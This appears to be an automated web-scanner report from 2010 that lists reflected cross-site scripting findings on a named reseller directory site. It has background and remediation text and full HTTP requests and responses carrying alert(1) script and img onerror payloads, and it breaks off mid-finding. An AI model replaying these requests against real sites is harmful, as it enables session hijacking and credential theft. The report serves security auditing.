/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 5]
/web-service/themes/kosmos/images/rating/search.php [REST URL parameter 6]
/web-service/themes/kosmos/images/rating/search.php [Submit3 parameter]
/web-service/themes/kosmos/images/rating/search.php [keyword parameter]
/web-service/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/rating/search.php [opt parameter]
/web-service/themes/kosmos/images/review/ [REST URL parameter 1]
/web-service/themes/kosmos/images/review/ [REST URL parameter 2]
/web-service/themes/kosmos/images/review/ [REST URL parameter 3]
/web-service/themes/kosmos/images/review/ [REST URL parameter 4]
/web-service/themes/kosmos/images/review/ [REST URL parameter 5]
/web-service/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 6]
/web-service/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 1]
/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 2]
/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 3]
/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 4]
/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 5]
/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 6]
/web-service/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/review/search.php [REST URL parameter 1]
/web-service/themes/kosmos/images/review/search.php [REST URL parameter 2]
/web-service/themes/kosmos/images/review/search.php [REST URL parameter 3]
/web-service/themes/kosmos/images/review/search.php [REST URL parameter 4]
/web-service/themes/kosmos/images/review/search.php [REST URL parameter 5]
/web-service/themes/kosmos/images/review/search.php [REST URL parameter 6]
/web-service/themes/kosmos/images/review/search.php [Submit3 parameter]
/web-service/themes/kosmos/images/review/search.php [keyword parameter]
/web-service/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/review/search.php [opt parameter]
/web-service/themes/kosmos/images/search.php [REST URL parameter 1]
/web-service/themes/kosmos/images/search.php [REST URL parameter 2]
/web-service/themes/kosmos/images/search.php [REST URL parameter 3]
/web-service/themes/kosmos/images/search.php [REST URL parameter 4]
/web-service/themes/kosmos/images/search.php [REST URL parameter 5]
/web-service/themes/kosmos/images/search.php [Submit3 parameter]
/web-service/themes/kosmos/images/search.php [keyword parameter]
/web-service/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/images/search.php [opt parameter]
/web-service/themes/kosmos/search.php [REST URL parameter 1]
/web-service/themes/kosmos/search.php [REST URL parameter 2]
/web-service/themes/kosmos/search.php [REST URL parameter 3]
/web-service/themes/kosmos/search.php [REST URL parameter 4]
/web-service/themes/kosmos/search.php [Submit3 parameter]
/web-service/themes/kosmos/search.php [keyword parameter]
/web-service/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]
/web-service/themes/kosmos/search.php [opt parameter]
/web-service/themes/search.php [REST URL parameter 1]
/web-service/themes/search.php [REST URL parameter 2]
/web-service/themes/search.php [REST URL parameter 3]
/web-service/themes/search.php [Submit3 parameter]
/web-service/themes/search.php [keyword parameter]
/web-service/themes/search.php [name of an arbitrarily supplied request parameter]
/web-service/themes/search.php [opt parameter]
/web-service/web-hosting/ [REST URL parameter 1]
/web-service/web-hosting/ [REST URL parameter 1]
/web-service/web-hosting/ [REST URL parameter 2]
/web-service/web-hosting/ [REST URL parameter 2]
/web-service/web-hosting/ [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/ [select parameter]
/web-service/web-hosting/googlepr.php [REST URL parameter 1]
/web-service/web-hosting/googlepr.php [REST URL parameter 2]
/web-service/web-hosting/googlepr.php [REST URL parameter 3]
/web-service/web-hosting/googlepr.php [link_id parameter]
/web-service/web-hosting/googlepr.php [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/search.php [REST URL parameter 1]
/web-service/web-hosting/search.php [REST URL parameter 2]
/web-service/web-hosting/search.php [REST URL parameter 3]
/web-service/web-hosting/search.php [Submit3 parameter]
/web-service/web-hosting/search.php [cat parameter]
/web-service/web-hosting/search.php [cat parameter]
/web-service/web-hosting/search.php [keyword parameter]
/web-service/web-hosting/search.php [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/search.php [opt parameter]
/web-service/web-hosting/themes/ [REST URL parameter 1]
/web-service/web-hosting/themes/ [REST URL parameter 2]
/web-service/web-hosting/themes/ [REST URL parameter 3]
/web-service/web-hosting/themes/ [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/ [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/ [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/ [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/ [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/ [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 7]
/web-service/web-hosting/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]
/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]
/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 7]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [Submit3 parameter]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [keyword parameter]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/rating/search.php [opt parameter]
/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/review/ [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 7]
/web-service/web-hosting/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 7]
/web-service/web-hosting/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 7]
/web-service/web-hosting/themes/kosmos/images/review/search.php [Submit3 parameter]
/web-service/web-hosting/themes/kosmos/images/review/search.php [keyword parameter]
/web-service/web-hosting/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/review/search.php [opt parameter]
/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 6]
/web-service/web-hosting/themes/kosmos/images/search.php [Submit3 parameter]
/web-service/web-hosting/themes/kosmos/images/search.php [keyword parameter]
/web-service/web-hosting/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/images/search.php [opt parameter]
/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 1]
/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 2]
/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 3]
/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 4]
/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 5]
/web-service/web-hosting/themes/kosmos/search.php [Submit3 parameter]
/web-service/web-hosting/themes/kosmos/search.php [keyword parameter]
/web-service/web-hosting/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/kosmos/search.php [opt parameter]
/web-service/web-hosting/themes/search.php [REST URL parameter 1]
/web-service/web-hosting/themes/search.php [REST URL parameter 2]
/web-service/web-hosting/themes/search.php [REST URL parameter 3]
/web-service/web-hosting/themes/search.php [REST URL parameter 4]
/web-service/web-hosting/themes/search.php [Submit3 parameter]
/web-service/web-hosting/themes/search.php [keyword parameter]
/web-service/web-hosting/themes/search.php [name of an arbitrarily supplied request parameter]
/web-service/web-hosting/themes/search.php [opt parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.resellerbase.com/a [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90ec1<script>alert(1)</script>3550cc93fddcbb3b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /a90ec1<script>alert(1)</script>3550cc93fddcbb3b0?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:15:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a90ec1<script>alert(1)</script>3550cc93fddcbb3b0?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.2. http://www.resellerbase.com/a [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/a

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9fad8<script>alert(1)</script>110a704fa4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a9fad8<script>alert(1)</script>110a704fa4a HTTP/1.1
Accept: */*
Referer: http://resellerbase.com/login.php?f=13988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b&b=%2Fcp%2F
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a9fad8<script>alert(1)</script>110a704fa4a was not found on this server.</p>
...[SNIP]...

2.3. http://www.resellerbase.com/a [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload adb95<script>alert(1)</script>690cd44ec00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?adb95<script>alert(1)</script>690cd44ec00=1 HTTP/1.1
Accept: */*
Referer: http://resellerbase.com/login.php?f=13988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b&b=%2Fcp%2F
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a?adb95<script>alert(1)</script>690cd44ec00=1 was not found on this server.</p>
...[SNIP]...

2.4. http://www.resellerbase.com/a [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/a

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload de35a<a>0b2684ef8f7 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fde35a<a>0b2684ef8f7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fde35a<a>0b2684ef8f7 was not found on this server.</p>
...[SNIP]...

2.5. http://www.resellerbase.com/a/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/a/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da437<script>alert(1)</script>e93ebbc7104 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada437<script>alert(1)</script>e93ebbc7104/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:19:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /ada437<script>alert(1)</script>e93ebbc7104/more2.html was not found on this server.</p>
...[SNIP]...

2.6. http://www.resellerbase.com/a/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/a/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc076<script>alert(1)</script>a75a609a25c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/cc076<script>alert(1)</script>a75a609a25c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:19:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /a/cc076<script>alert(1)</script>a75a609a25c was not found on this server.</p>
...[SNIP]...

2.7. http://www.resellerbase.com/add.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/add.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57f5c<script>alert(1)</script>ec0ace067d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add.php57f5c<script>alert(1)</script>ec0ace067d HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /add.php57f5c<script>alert(1)</script>ec0ace067d was not found on this server.</p>
...[SNIP]...

2.8. http://www.resellerbase.com/add.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/add.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c616<script>alert(1)</script>888295c8e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /add.php1c616<script>alert(1)</script>888295c8e1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=15
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: multipart/form-data; boundary=--------303737341
Content-Length: 1398

----------303737341
Content-Disposition: form-data; name="cat"

7
----------303737341
Content-Disposition: form-data; name="reciprocal_url"

555-555-0199@example.com
----------303737341
Conte
...[SNIP]...

Response (redirected)

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /add.php1c616<script>alert(1)</script>888295c8e1 was not found on this server.</p>
...[SNIP]...

2.9. http://www.resellerbase.com/admin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/admin/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4de5<script>alert(1)</script>3300277d6f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adminb4de5<script>alert(1)</script>3300277d6f7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:20:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

